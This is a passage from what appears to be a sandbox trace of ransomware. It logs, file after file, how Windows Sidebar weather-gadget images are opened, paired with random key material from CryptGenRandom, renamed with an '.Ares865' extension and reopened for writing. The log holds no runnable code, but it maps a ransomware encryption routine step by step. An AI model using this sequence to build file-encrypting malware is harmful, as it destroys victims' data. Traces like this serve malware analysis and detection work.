dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.727] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24821) returned 1 [0116.727] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.727] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.727] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.733] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.734] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.734] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.735] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full.png.Ares865") returned 105 [0116.735] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full.png.ares865"), dwFlags=0x1) returned 1 [0116.737] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.737] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20194) returned 1 [0116.737] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.738] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.738] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.741] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.742] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.742] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.742] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full_partly-cloudy.png.Ares865") returned 119 [0116.742] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.744] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26089) returned 1 [0116.744] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.745] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.745] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.748] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.748] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.748] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.749] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter.png.Ares865") returned 113 [0116.749] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter.png.ares865"), dwFlags=0x1) returned 1 [0116.751] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.751] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18960) returned 1 [0116.751] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.752] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.752] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.755] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.755] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.755] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.756] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png.Ares865") returned 127 [0116.756] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.757] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.758] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25006) returned 1 [0116.758] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.758] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.759] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.769] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.770] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.770] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.771] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new.png.Ares865") returned 104 [0116.771] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new.png.ares865"), dwFlags=0x1) returned 1 [0116.774] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.774] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21898) returned 1 [0116.774] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.775] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.775] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.778] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.778] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.778] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.779] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new_partly-cloudy.png.Ares865") returned 118 [0116.779] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.781] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.781] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27366) returned 1 [0116.781] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.782] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.782] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.785] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.785] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.785] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.786] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent.png.Ares865") returned 116 [0116.786] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent.png.ares865"), dwFlags=0x1) returned 1 [0116.788] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.788] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19841) returned 1 [0116.789] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.789] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.789] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.792] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.793] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.793] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.793] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png.Ares865") returned 130 [0116.793] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.795] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25705) returned 1 [0116.795] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.796] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.796] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.799] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.799] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.799] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.800] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous.png.Ares865") returned 115 [0116.800] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous.png.ares865"), dwFlags=0x1) returned 1 [0116.802] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.802] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19335) returned 1 [0116.802] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.803] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.803] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.806] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.806] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.807] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.807] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png.Ares865") returned 129 [0116.807] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.809] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.809] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25339) returned 1 [0116.809] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.810] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.810] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.813] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.814] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.814] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.815] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent.png.Ares865") returned 116 [0116.815] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent.png.ares865"), dwFlags=0x1) returned 1 [0116.817] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.817] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19923) returned 1 [0116.818] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.818] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.818] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.821] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.822] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.822] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.823] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png.Ares865") returned 130 [0116.823] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.824] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.825] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25685) returned 1 [0116.825] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.825] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.825] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.828] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.829] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.829] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.830] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous.png.Ares865") returned 115 [0116.830] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous.png" (normalized: "c:\\program files (x86)\\windows 